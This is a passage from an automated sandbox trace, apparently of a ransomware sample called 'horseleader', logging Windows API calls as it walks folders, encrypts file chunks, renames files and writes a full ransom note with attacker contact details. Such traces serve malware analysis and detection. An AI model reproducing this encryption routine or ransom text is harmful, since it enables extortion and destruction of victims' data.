Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.horseleader") returned 107 [0245.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof.horseleader")) returned 1 [0245.421] GetProcessHeap () returned 0x780000 [0245.421] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.421] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0xba5e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.MOF", cAlternateFileName="")) returned 0 [0245.421] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.421] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\#Decrypt#.txt") returned 97 [0245.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.422] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.422] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.424] lstrlenA (lpString="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") returned 1368 [0245.424] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.424] CloseHandle (hObject=0x21c) returned 1 [0245.424] GetProcessHeap () returned 0x780000 [0245.424] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.424] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PROOF", cAlternateFileName="")) returned 1 [0245.424] lstrcmpiW (lpString1="PROOF", lpString2="Windows") returned -1 [0245.424] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned 56 [0245.424] lstrcmpW (lpString1="PROOF", lpString2=".") returned 1 [0245.424] lstrcmpW (lpString1="PROOF", lpString2="..") returned 1 [0245.425] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.425] GetProcessHeap () returned 0x780000 [0245.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7e1110 [0245.425] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*") returned 58 [0245.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.426] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\.") returned 58 [0245.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.427] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.427] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\..") returned 59 [0245.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.427] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d0e00, ftCreationTime.dwHighDateTime=0x1ca2cea, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa07d0e00, ftLastWriteTime.dwHighDateTime=0x1ca2cea, nFileSizeHigh=0x0, nFileSizeLow=0x90540, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSLID.DLL", cAlternateFileName="")) returned 1 [0245.427] lstrcmpiW (lpString1="MSLID.DLL", lpString2="Windows") returned -1 [0245.427] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 [0245.427] StrStrIW (lpFirst="MSLID.DLL", lpSrch=".horseleader") returned 0x0 [0245.427] lstrcmpW (lpString1="MSLID.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.427] lstrcmpW (lpString1="MSLID.DLL", lpString2="_uninstalling_.png") returned 1 [0245.427] lstrlenW (lpString=".testttjffg") returned 11 [0245.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL", lpSrch=".testttjffg") returned 0x0 [0245.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 
[0245.428] StrStrW (lpFirst="MSLID.DLL", lpSrch=".txt") returned 0x0 [0245.428] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=591168) returned 1 [0245.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.436] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x45aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.436] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.438] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.439] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8b540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.439] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.442] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.442] CloseHandle (hObject=0x158) returned 1 [0245.442] GetProcessHeap () returned 0x780000 [0245.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.442] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.horseleader") returned 78 [0245.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll.horseleader")) returned 1 [0245.444] GetProcessHeap () returned 
0x780000 [0245.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x782b2c00, ftCreationTime.dwHighDateTime=0x1bada3f, ftLastAccessTime.dwLowDateTime=0x98a53b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x782b2c00, ftLastWriteTime.dwHighDateTime=0x1bada3f, nFileSizeHigh=0x0, nFileSizeLow=0x6c67b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_EN.LEX", cAlternateFileName="")) returned 1 [0245.444] lstrcmpiW (lpString1="MSWDS_EN.LEX", lpString2="Windows") returned -1 [0245.444] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0245.444] StrStrIW (lpFirst="MSWDS_EN.LEX", lpSrch=".horseleader") returned 0x0 [0245.444] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.444] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="_uninstalling_.png") returned 1 [0245.444] lstrlenW (lpString=".testttjffg") returned 11 [0245.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX", lpSrch=".testttjffg") returned 0x0 [0245.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.445] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0245.446] StrStrW (lpFirst="MSWDS_EN.LEX", lpSrch=".txt") returned 0x0 [0245.446] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=444027) returned 1 [0245.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.446] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.449] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.449] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.450] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x33b3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.450] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.451] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.451] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.451] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x6767b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.451] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.455] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.456] CloseHandle (hObject=0x158) returned 1 [0245.456] GetProcessHeap () returned 0x780000 [0245.456] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.456] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.horseleader") returned 81 [0245.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex.horseleader")) returned 1 [0245.458] GetProcessHeap () returned 0x780000 [0245.459] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.459] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e2ea00, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x5b0da70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5e2ea00, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x60983, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_ES.LEX", cAlternateFileName="")) returned 1 [0245.459] lstrcmpiW (lpString1="MSWDS_ES.LEX", lpString2="Windows") returned -1 [0245.459] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0245.459] StrStrIW (lpFirst="MSWDS_ES.LEX", lpSrch=".horseleader") returned 0x0 [0245.459] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.459] lstrcmpW (lpString1="MSWDS_ES.LEX", lpString2="_uninstalling_.png") returned 1 [0245.459] lstrlenW (lpString=".testttjffg") returned 11 [0245.459] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX", lpSrch=".testttjffg") returned 0x0 [0245.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.460] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned 69 [0245.460] StrStrW (lpFirst="MSWDS_ES.LEX", lpSrch=".txt") returned 0x0 [0245.460] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=395651) returned 1 [0245.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.460] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.463] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2dcc1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.465] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.466] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5b983, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.466] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.469] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.469] CloseHandle (hObject=0x158) returned 1 [0245.469] GetProcessHeap () returned 0x780000 [0245.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.469] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 